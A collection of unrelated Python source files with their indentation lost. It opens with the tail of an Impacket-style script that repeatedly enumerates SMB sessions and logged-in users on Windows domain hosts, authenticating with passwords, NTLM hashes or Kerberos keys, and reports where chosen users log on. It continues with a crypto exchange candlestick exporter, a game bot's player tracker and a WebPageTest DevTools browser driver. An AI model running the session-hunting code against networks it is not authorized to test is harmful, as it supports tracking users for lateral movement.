elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception as e:
#import traceback
#traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who createad a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
else:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
else:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
if printCRLF is True:
print()
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who looged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
if printCRLF is True:
print()
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '
'run in domain mode.')
parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '
'from (one per line). If not specified script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
'(default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
'opened (default 1000)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password = parse_credentials(options.identity)
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
|
out_ohlcv.py
|
import datetime
import os
import shutil
import threading
import time
from datetime import date, timedelta
import XsCore
import json
import pandas as pd
from PySide6 import QtWidgets
from PySide6.QtCore import QTimer
from PySide6.QtGui import Qt
from PySide6.QtWidgets import QSizePolicy, QHeaderView
from XsCore import XsDateUtils
from ccxt import Exchange, NetworkError
from pandas_model import PandasModel
from plugin_base import PluginBase
from plugin_ui_base import PluginUiBase
class Out_Ohlcv_XsPlugin(PluginBase):
name: str = "Out_Ohlcv"
display_name: str = "导出历史K线"
info = "调用方法:exchange.fetch_ohlcv(symbol, timeframe='1m', since=start_time_stamp, limit=limit_count)"
def get_ui(self) -> QtWidgets.QVBoxLayout():
return OrderBooksUi(self.exchange)
class OrderBooksUi(PluginUiBase):
kline_type = {
'分钟': '1m',
'小时': '1h',
'天': '1d',
}
def data_bind(self):
self.on_log('数据加载中...', is_json=False)
try:
markets = self.exchange.load_markets()
self.on_log(markets)
except NetworkError as err:
self.on_log(f'请示Api无法响应:{err}', is_json=False)
return
lstSort = []
for key in markets:
lstSort.append(key)
lstSort.sort()
self.listWidget.addItems(lstSort)
# for key in markets:
# self.listWidget.addItem(key)
def __init__(self, ex):
super().__init__(ex)
self.vbox = QtWidgets.QHBoxLayout()
self.setLayout(self.vbox)
self.listWidget = QtWidgets.QListWidget()
# self.json_box = QtWidgets.QTextBrowser()
self.v_right = QtWidgets.QVBoxLayout()
self.vbox.addWidget(self.listWidget)
self.vbox.addLayout(self.v_right)
self.v_right.addWidget(QtWidgets.QLabel('选择K线类型'))
self.cb_k_type = QtWidgets.QComboBox()
self.cb_k_type.addItems(self.kline_type.keys())
self.v_right.addWidget(self.cb_k_type)
self.v_right.addWidget(QtWidgets.QLabel('选择开始日期'))
self.dt_start = QtWidgets.QDateEdit()
to_date = date.today()
to_date += timedelta(days=-7)
self.dt_start.setDate(to_date)
self.v_right.addWidget(self.dt_start)
self.v_right.addWidget(QtWidgets.QLabel('选择结束日期'))
self.dt_end = QtWidgets.QDateEdit()
self.dt_end.setDate(date.today())
self.v_right.addWidget(self.dt_end)
self.btn_sel_path = QtWidgets.QPushButton("选择保存目录")
self.btn_sel_path.clicked.connect(self.sel_path)
self.v_right.addWidget(self.btn_sel_path)
self.btn_save = QtWidgets.QPushButton("导出")
self.btn_save.clicked.connect(self.start_run)
self.v_right.addWidget(self.btn_save)
self.listWidget.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)
self.listWidget.itemClicked.connect(self.clicked)
self.symbol = ''
self.out_path = '' # 用户选择的最终整合导出目录
self.save_dir = "" # 保存临时数据目录
self.startTime = ""
self.endTime = ""
self.timeType = ""
def sel_path(self):
directory = QtWidgets.QFileDialog.getExistingDirectory(self, "getExistingDirectory", "./")
self.out_path = directory
self.btn_sel_path.setText(directory)
def start_run(self):
if self.symbol == '':
XsCore.showInfo('请先选择交易对')
return
if self.out_path == '':
XsCore.showInfo('请选择导出目录')
return
self.timeType = self.cb_k_type.currentText()
self.startTime = self.dt_start.date().toString(Qt.ISODate)
self.endTime = self.dt_end.date().toString(Qt.ISODate)
self.btn_save.setEnabled(False)
thread_bind = threading.Thread(target=self.get_kline,args=(self.symbol, self.startTime, self.endTime,self.kline_type[self.timeType])) # args=(i,)
thread_bind.start()
# self.get_kline(self.symbol, s, e,self.kline_type[kl_type_key])
def get_kline(self, symbol, start_time, end_time,date_type = '1m'):
"""
爬取交易所数据的方法.
:param date_type:
:param symbol: 请求的symbol: like BTC/USDT, ETH/USD等。
:param start_time: like 2018-1-1
:param end_time: like 2019-1-1
:return:
"""
current_path = os.getcwd()
file_dir = os.path.join(current_path,'database\\out', symbol.replace('/', ''))
if os.path.exists(file_dir):
# 如果目录存在,需要先删除,这样可以先清空目录下的数据.
shutil.rmtree(file_dir) # 对非空目录的删除要使用 shutil.rmtree,而os.removedirs 只能删除空目录
print("删除目录")
os.makedirs(file_dir) # 创建这个文件夹,用来存放临时数据
self.save_dir = file_dir
start_time = datetime.datetime.strptime(start_time, '%Y-%m-%d')
end_time = datetime.datetime.strptime(end_time, '%Y-%m-%d')
start_time_stamp = int(time.mktime(start_time.timetuple())) * 1000
end_time_stamp = int(time.mktime(end_time.timetuple())) * 1000
limit_count = 200 # bybit 请求的数据有限制,每次只能请求200个.
self.on_log('开始获取数据...', is_json=False)
while True:
try:
print(f'从开始时间:{start_time_stamp}开始请求{limit_count}条数据')
data = self.exchange.fetch_ohlcv(symbol, timeframe=date_type, since=start_time_stamp, limit=limit_count)
df = pd.DataFrame(data)
df.rename(columns={0: 'datetime', 1: 'open', 2: 'high', 3: 'low', 4: 'close', 5: 'volume'},
inplace=True)
start_time_stamp = int(df.iloc[-1]['datetime']) # 获取下一个次请求的时间.
filename = str(start_time_stamp) + '.csv'
save_file_path = os.path.join(file_dir, filename)
df.set_index('datetime', drop=True, inplace=True)
df.to_csv(save_file_path)
# self.on_log(f'保存成功:{save_file_path}', is_json=False)
if start_time_stamp > end_time_stamp:
print("完成数据的请求.")
# self.on_log('完成数据的请求', is_json=False)
break
time.sleep(0.2) # 1/25
except Exception as error:
print("发生错误了:")
print(error)
time.sleep(10)
print("清洗数据.")
self.clear_datas()
print("结束.")
self.on_log('所有操作完成!', is_json=False)
self.btn_save.setEnabled(True)
def closeEvent(self, event):
print('当前插件关闭...')
# self.timer.stop()
event.accept()
self.destroy()
# event.ignore()
def clicked(self, item):
self.symbol = item.text()
def sample_datas(self):
"""
:param exchange_name:
:param symbol:
:return:
"""
path = self.save_dir
file_paths = []
for root, dirs, files in os.walk(path):
if files:
for file in files:
if file.endswith('.csv'):
file_paths.append(os.path.join(path, file))
file_paths = sorted(file_paths)
all_df = pd.DataFrame()
for file in file_paths:
df = pd.read_csv(file)
# all_df = all_df.append(df, ignore_index=True)
all_df = pd.concat([all_df,df], ignore_index=True)
all_df = all_df.sort_values(by='datetime', ascending=True)
# print(all_df)
return all_df
# for index, item in all_df.iterrows():
# try:
# dt = (pd.to_datetime(item['open_time'], unit='ms'))
# print(dt)
# dt = datetime.datetime.strptime(str(dt), '%Y-%m-%d %H:%M:%S') # 2018-01-01 17:36:00:42
# print(dt)
# except:
# dt = (pd.to_datetime(item['open_time'], unit='ms'))
# print(dt)
def clear_datas(self):
df = self.sample_datas()
# print(df)
# exit()
# df['open_time'] = df['open_time'].apply(lambda x: time.mktime(x.timetuple()))
# # 日期.timetuple() 这个用法 通过它将日期转换成时间元组
# # print(df)
# df['open_time'] = df['open_time'].apply(lambda x: (x // 60) * 60 * 1000)
df['datetime'] = df['datetime'].apply(lambda x: (x // 60) * 60) # 获取整分的数据.
print(df)
df['Datetime2'] = pd.to_datetime(df['datetime'], unit='ms') + pd.Timedelta(hours=8) # 把UTC时间转成北京时间.
df['Datetime2'] = df['Datetime2'].apply(lambda x: str(x)[0:19]) # 2018-11-15 00:47:0034, 通过截取字符串长度.
# df['Datetime3'] = XsDateUtils.seconds_to_str(df['datetime'].astype(int)/1000)
df.drop_duplicates(subset=['datetime'], inplace=True)
df.set_index('Datetime2', inplace=True)
# print("*" * 20)
# print(df)
savetodir = f'{self.out_path}/{self.symbol.replace("/","")}从{self.startTime}到{self.endTime}的{self.timeType}线.csv'
print(savetodir)
df.to_csv(savetodir)
|
hideout.py
|
''' track players in hideout '''
import threading
import logging
from player import players
from misc import my_queue, player_joined_q, PLAYER_JOINED_STATUS
import config
logger = logging.getLogger('bot_log')
class Hideout():
''' monitor player activity in hideout '''
def __init__(self):
self.updater_thread = None
self._new_activity_q = my_queue("players joined")
def start(self):
''' Start a thread that peridically consumes player joined/left area events '''
self.updater_thread = threading.Thread(
target=self.track_hideout_activity, args=(player_joined_q,))
self.updater_thread.daemon = True
self.updater_thread.start()
def track_hideout_activity(self, queue):
''' listen to the queue and update the players present in hideout '''
while True:
msg = queue.get()
if msg.new_status == PLAYER_JOINED_STATUS.JOINED:
player = players.get_player(msg.player_name)
if player is None:
logger.warning(
"Player {} joined area but it is not in player list".format(msg.player_name))
else:
player.joined_hideout()
logger.info(
"Player {} has joined the area".format(player))
logger.debug(
"Players in area {}".format(players.get_all()))
# Add this player to the "recently joined" queue
self._new_activity_q.put(player)
elif msg.new_status == PLAYER_JOINED_STATUS.LEFT:
player = players.get_player(msg.player_name)
if player is None:
logger.warning(
"Player {} left area but it is not in player list".format(msg.player_name))
else:
player.left_hideout()
# Stop tracking players when they leave the hideout
players.remove_player(player)
logger.info(
"Player {} has left the area".format(player))
logger.debug(
"Players in area {}".format(players.get_all()))
else:
pass
def recently_joined_players(self):
''' returns an array of TRACKED players that have joined the area since last call '''
players = []
# Fetch all recent events
while True:
temp = self._new_activity_q.get(block=False)
if temp is not None:
players.append(temp)
else:
break
return players
hideout = Hideout()
if __name__ == '__main__':
logger.setLevel(level=logging.DEBUG)
console_log = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(levelname)s %(lineno)d:%(filename)s(%(process)d) - %(message)s')
console_log.setFormatter(formatter)
logger.addHandler(console_log)
from log_parser import LogParser
import time
parser = LogParser(config.LOG_PATH)
parser.start()
hideout.start()
while True:
time.sleep(1)
|
devtools_browser.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Base class support for browsers that speak the dev tools protocol"""
import glob
import gzip
import io
import logging
import os
import re
import shutil
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
unicode = str
GZIP_TEXT = 'wt'
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
from .optimization_checks import OptimizationChecks
class DevtoolsBrowser(object):
"""Devtools Browser base"""
CONNECT_TIME_LIMIT = 120
def __init__(self, options, job, use_devtools_video=True):
self.options = options
self.job = job
self.devtools = None
self.task = None
self.event_name = None
self.browser_version = None
self.device_pixel_ratio = None
self.use_devtools_video = use_devtools_video
self.lighthouse_command = None
self.devtools_screenshot = True
self.support_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'support')
self.script_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'js')
def connect(self, task):
"""Connect to the dev tools interface"""
ret = False
from internal.devtools import DevTools
self.devtools = DevTools(self.options, self.job, task, self.use_devtools_video)
if task['running_lighthouse']:
ret = self.devtools.wait_for_available(self.CONNECT_TIME_LIMIT)
else:
if self.devtools.connect(self.CONNECT_TIME_LIMIT):
logging.debug("Devtools connected")
ret = True
else:
task['error'] = "Error connecting to dev tools interface"
logging.critical(task['error'])
self.devtools = None
return ret
def disconnect(self):
"""Disconnect from dev tools"""
if self.devtools is not None:
# Always navigate to about:blank after finishing in case the tab is
# remembered across sessions
if self.task is not None and self.task['error'] is None:
self.devtools.send_command('Page.navigate', {'url': 'about:blank'}, wait=True)
self.devtools.close()
self.devtools = None
def prepare_browser(self, task):
"""Prepare the running browser (mobile emulation, UA string, etc"""
if self.devtools is not None:
# Figure out the native viewport size
if not self.options.android:
size = self.devtools.execute_js("[window.innerWidth, window.innerHeight]")
if size is not None and len(size) == 2:
task['actual_viewport'] = {"width": size[0], "height": size[1]}
# Get the native device pixel ratio
if self.device_pixel_ratio is None:
self.device_pixel_ratio = 1.0
try:
ratio = self.devtools.execute_js('window.devicePixelRatio')
if ratio is not None:
self.device_pixel_ratio = max(1.0, float(ratio))
except Exception:
pass
# Clear the caches
if not task['cached']:
self.devtools.send_command("Network.clearBrowserCache", {},
wait=True)
self.devtools.send_command("Network.clearBrowserCookies", {},
wait=True)
# Mobile Emulation
if not self.options.android and \
'mobile' in self.job and self.job['mobile'] and \
'width' in self.job and 'height' in self.job and \
'dpr' in self.job:
width = int(re.search(r'\d+', str(self.job['width'])).group())
height = int(re.search(r'\d+', str(self.job['height'])).group())
self.devtools.send_command("Emulation.setDeviceMetricsOverride",
{"width": width,
"height": height,
"screenWidth": width,
"screenHeight": height,
"scale": 1,
"positionX": 0,
"positionY": 0,
"deviceScaleFactor": float(self.job['dpr']),
"mobile": True,
"screenOrientation":
{"angle": 0, "type": "portraitPrimary"}},
wait=True)
self.devtools.send_command("Emulation.setTouchEmulationEnabled",
{"enabled": True,
"configuration": "mobile"},
wait=True)
self.devtools.send_command("Emulation.setScrollbarsHidden",
{"hidden": True},
wait=True)
if (task['running_lighthouse'] or not self.options.throttle) and 'throttle_cpu' in self.job:
logging.debug('CPU Throttle target: %0.3fx', self.job['throttle_cpu'])
if self.job['throttle_cpu'] > 1:
self.devtools.send_command("Emulation.setCPUThrottlingRate",
{"rate": self.job['throttle_cpu']},
wait=True)
# Location
if 'lat' in self.job and 'lng' in self.job:
try:
lat = float(str(self.job['lat']))
lng = float(str(self.job['lng']))
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': 0})
except Exception:
logging.exception('Error overriding location')
# UA String
ua_string = self.devtools.execute_js("navigator.userAgent")
if ua_string is not None:
match = re.search(r'Chrome\/(\d+\.\d+\.\d+\.\d+)', ua_string)
if match:
self.browser_version = match.group(1)
if 'uastring' in self.job:
ua_string = self.job['uastring']
if ua_string is not None and 'AppendUA' in task:
ua_string += ' ' + task['AppendUA']
if ua_string is not None:
self.job['user_agent_string'] = ua_string
# Disable js
if self.job['noscript']:
self.devtools.send_command("Emulation.setScriptExecutionDisabled",
{"value": True}, wait=True)
self.devtools.prepare_browser()
def on_start_recording(self, task):
"""Start recording"""
task['page_data'] = {'date': time.time()}
task['page_result'] = None
task['run_start_time'] = monotonic()
if self.browser_version is not None and 'browserVersion' not in task['page_data']:
task['page_data']['browserVersion'] = self.browser_version
task['page_data']['browser_version'] = self.browser_version
if not self.options.throttle and 'throttle_cpu' in self.job:
task['page_data']['throttle_cpu_requested'] = self.job['throttle_cpu_requested']
if self.job['throttle_cpu'] > 1:
task['page_data']['throttle_cpu'] = self.job['throttle_cpu']
if self.devtools is not None:
self.devtools.start_recording()
def on_stop_capture(self, task):
"""Do any quick work to stop things that are capturing data"""
if self.devtools is not None:
self.devtools.stop_capture()
def on_stop_recording(self, task):
"""Stop recording"""
if self.devtools is not None:
self.devtools.collect_trace()
if self.devtools_screenshot:
if self.job['pngScreenShot']:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.png')
self.devtools.grab_screenshot(screen_shot, png=True)
else:
screen_shot = os.path.join(task['dir'],
task['prefix'] + '_screen.jpg')
self.devtools.grab_screenshot(screen_shot, png=False, resize=600)
# Collect end of test data from the browser
self.collect_browser_metrics(task)
# Stop recording dev tools (which also collects the trace)
self.devtools.stop_recording()
def run_task(self, task):
"""Run an individual test"""
if self.devtools is not None:
self.task = task
logging.debug("Running test")
end_time = monotonic() + task['test_time_limit']
task['current_step'] = 1
recording = False
while len(task['script']) and task['error'] is None and \
monotonic() < end_time:
self.prepare_task(task)
command = task['script'].pop(0)
if not recording and command['record']:
recording = True
self.on_start_recording(task)
self.process_command(command)
if command['record']:
self.devtools.wait_for_page_load()
if not task['combine_steps'] or not len(task['script']):
self.on_stop_capture(task)
self.on_stop_recording(task)
recording = False
self.on_start_processing(task)
self.wait_for_processing(task)
self.process_devtools_requests(task)
self.step_complete(task) #pylint: disable=no-member
if task['log_data']:
# Move on to the next step
task['current_step'] += 1
self.event_name = None
task['navigated'] = True
self.task = None
def on_start_processing(self, task):
"""Start any processing of the captured data"""
if task['log_data']:
# Start the processing that can run in a background thread
optimization = OptimizationChecks(self.job, task, self.get_requests())
optimization.start()
# Run the video post-processing
if self.use_devtools_video and self.job['video']:
self.process_video()
self.wappalyzer_detect(task, self.devtools.main_request_headers)
# wait for the background optimization checks
optimization.join()
def wait_for_processing(self, task):
"""Wait for the background processing (if any)"""
pass
def execute_js(self, script):
"""Run javascipt"""
ret = None
if self.devtools is not None:
ret = self.devtools.execute_js(script)
return ret
def prepare_task(self, task):
"""Format the file prefixes for multi-step testing"""
if task['current_step'] == 1:
task['prefix'] = task['task_prefix']
task['video_subdirectory'] = task['task_video_prefix']
else:
task['prefix'] = '{0}_{1:d}'.format(task['task_prefix'], task['current_step'])
task['video_subdirectory'] = '{0}_{1:d}'.format(task['task_video_prefix'],
task['current_step'])
if task['video_subdirectory'] not in task['video_directories']:
task['video_directories'].append(task['video_subdirectory'])
if self.event_name is not None:
task['step_name'] = self.event_name
else:
task['step_name'] = 'Step_{0:d}'.format(task['current_step'])
def process_video(self):
"""Post process the video"""
from internal.video_processing import VideoProcessing
video = VideoProcessing(self.options, self.job, self.task)
video.process()
def process_devtools_requests(self, task):
"""Process the devtools log and pull out the requests information"""
path_base = os.path.join(self.task['dir'], self.task['prefix'])
devtools_file = path_base + '_devtools.json.gz'
if os.path.isfile(devtools_file):
from internal.support.devtools_parser import DevToolsParser
out_file = path_base + '_devtools_requests.json.gz'
options = {'devtools': devtools_file, 'cached': task['cached'], 'out': out_file}
netlog = path_base + '_netlog_requests.json.gz'
options['netlog'] = netlog if os.path.isfile(netlog) else None
optimization = path_base + '_optimization.json.gz'
options['optimization'] = optimization if os.path.isfile(optimization) else None
user_timing = path_base + '_user_timing.json.gz'
options['user'] = user_timing if os.path.isfile(user_timing) else None
coverage = path_base + '_coverage.json.gz'
options['coverage'] = coverage if os.path.isfile(coverage) else None
cpu = path_base + '_timeline_cpu.json.gz'
options['cpu'] = cpu if os.path.isfile(cpu) else None
v8stats = path_base + '_v8stats.json.gz'
options['v8stats'] = v8stats if os.path.isfile(v8stats) else None
parser = DevToolsParser(options)
parser.process()
# Cleanup intermediate files that are not needed
if 'debug' not in self.job or not self.job['debug']:
if os.path.isfile(netlog):
os.remove(netlog)
if os.path.isfile(optimization):
os.remove(optimization)
if os.path.isfile(coverage):
os.remove(coverage)
if os.path.isfile(devtools_file):
os.remove(devtools_file)
if 'page_data' in parser.result and 'result' in parser.result['page_data']:
self.task['page_result'] = parser.result['page_data']['result']
def run_js_file(self, file_name):
"""Execute one of our js scripts"""
ret = None
script = None
script_file_path = os.path.join(self.script_dir, file_name)
if os.path.isfile(script_file_path):
with io.open(script_file_path, 'r', encoding='utf-8') as script_file:
script = script_file.read()
if script is not None:
ret = self.devtools.execute_js(script)
return ret
def collect_browser_metrics(self, task):
"""Collect all of the in-page browser metrics that we need"""
user_timing = self.run_js_file('user_timing.js')
if user_timing is not None:
path = os.path.join(task['dir'], task['prefix'] + '_timed_events.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(user_timing))
page_data = self.run_js_file('page_data.js')
if page_data is not None:
task['page_data'].update(page_data)
if 'customMetrics' in self.job:
custom_metrics = {}
for name in self.job['customMetrics']:
script = 'var wptCustomMetric = function() {' +\
self.job['customMetrics'][name] +\
'};try{wptCustomMetric();}catch(e){};'
custom_metrics[name] = self.devtools.execute_js(script)
path = os.path.join(task['dir'], task['prefix'] + '_metrics.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(custom_metrics))
if 'heroElementTimes' in self.job and self.job['heroElementTimes']:
hero_elements = None
custom_hero_selectors = {}
if 'heroElements' in self.job:
custom_hero_selectors = self.job['heroElements']
with io.open(os.path.join(self.script_dir, 'hero_elements.js'), 'r', encoding='utf-8') as script_file:
hero_elements_script = script_file.read()
script = hero_elements_script + '(' + json.dumps(custom_hero_selectors) + ')'
hero_elements = self.devtools.execute_js(script)
if hero_elements is not None:
logging.debug('Hero Elements: %s', json.dumps(hero_elements))
path = os.path.join(task['dir'], task['prefix'] + '_hero_elements.json.gz')
with gzip.open(path, GZIP_TEXT, 7) as outfile:
outfile.write(json.dumps(hero_elements))
def process_command(self, command):
"""Process an individual script command"""
logging.debug("Processing script command:")
logging.debug(command)
if command['command'] == 'navigate':
self.task['page_data']['URL'] = command['target']
url = str(command['target']).replace('"', '\"')
script = 'window.location="{0}";'.format(url)
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'logdata':
self.task['combine_steps'] = False
if int(re.search(r'\d+', str(command['target'])).group()):
logging.debug("Data logging enabled")
self.task['log_data'] = True
else:
logging.debug("Data logging disabled")
self.task['log_data'] = False
elif command['command'] == 'combinesteps':
self.task['log_data'] = True
self.task['combine_steps'] = True
elif command['command'] == 'seteventname':
self.event_name = command['target']
elif command['command'] == 'exec':
script = command['target']
if command['record']:
script = self.prepare_script_for_record(script) #pylint: disable=no-member
self.devtools.start_navigating()
self.devtools.execute_js(script)
elif command['command'] == 'sleep':
delay = min(60, max(0, int(re.search(r'\d+', str(command['target'])).group())))
if delay > 0:
time.sleep(delay)
elif command['command'] == 'setabm':
self.task['stop_at_onload'] = bool('target' in command and
int(re.search(r'\d+',
str(command['target'])).group()) == 0)
elif command['command'] == 'setactivitytimeout':
if 'target' in command:
milliseconds = int(re.search(r'\d+', str(command['target'])).group())
self.task['activity_time'] = max(0, min(30, float(milliseconds) / 1000.0))
elif command['command'] == 'setuseragent':
self.task['user_agent_string'] = command['target']
elif command['command'] == 'setcookie':
if 'target' in command and 'value' in command:
url = command['target'].strip()
cookie = command['value']
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
name = cookie[:pos].strip()
value = cookie[pos + 1:].strip()
if len(name) and len(value) and len(url):
self.devtools.send_command('Network.setCookie',
{'url': url, 'name': name, 'value': value})
elif command['command'] == 'setlocation':
try:
if 'target' in command and command['target'].find(',') > 0:
accuracy = 0
if 'value' in command and re.match(r'\d+', command['value']):
accuracy = int(re.search(r'\d+', str(command['value'])).group())
parts = command['target'].split(',')
lat = float(parts[0])
lng = float(parts[1])
self.devtools.send_command(
'Emulation.setGeolocationOverride',
{'latitude': lat, 'longitude': lng,
'accuracy': accuracy})
except Exception:
logging.exception('Error setting location')
elif command['command'] == 'addheader':
self.devtools.set_header(command['target'])
elif command['command'] == 'setheader':
